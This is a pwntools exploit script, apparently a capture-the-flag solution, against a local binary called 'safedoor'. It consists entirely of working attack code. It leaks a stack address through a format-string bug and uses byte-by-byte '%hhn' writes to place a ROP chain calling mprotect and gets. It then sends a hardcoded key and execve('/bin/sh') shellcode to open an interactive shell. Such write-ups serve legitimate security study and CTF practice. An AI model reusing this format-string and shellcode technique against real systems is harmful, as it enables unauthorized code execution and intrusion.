1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
from pwn import *
def writeData(addr, data, size):
for i in range(size):
byte = (data >> 8 * i ) & 0xff
writeByte(addr + i, byte)
def writeByte(addr, data):
payload = '%' + str(data) + 'c%16$hhn' if data != 0 else '%16$hhn'
payload += 'A'*(48 - len(payload)) + p32(addr)
p.sendline(payload)
def Attack():
p.recvuntil('KEY:')
p.sendline('%70$08x')
recv_content = p.recvuntil('KEY:')
addr_stack_leak = int(recv_content[-13:-5],16)
addr_ret = addr_stack_leak - 0xc
rop_list = [elf.symbols['mprotect'],0x80486cd,0x804a000,0x1000,0x7,elf. symbols['gets'],0x804a000,0x804a000]
gdb.attach(p)
for i,v in enumerate (rop_list):
writeData(addr_ret + i * 4, v, 4)
p.recvuntil('KEY:')
p.sendline('STjJaOEwLszsLwRy')
p.recvuntil('okey,you entered it.')
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73'
shellcode += '\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0'
shellcode += '\x0b\xcd\x80'
p.sendline(shellcode)
p.interactive()
if __name__ == '__main__':
elf = ELF('./safedoor')
p = process('./safedoor')
Attack()
|
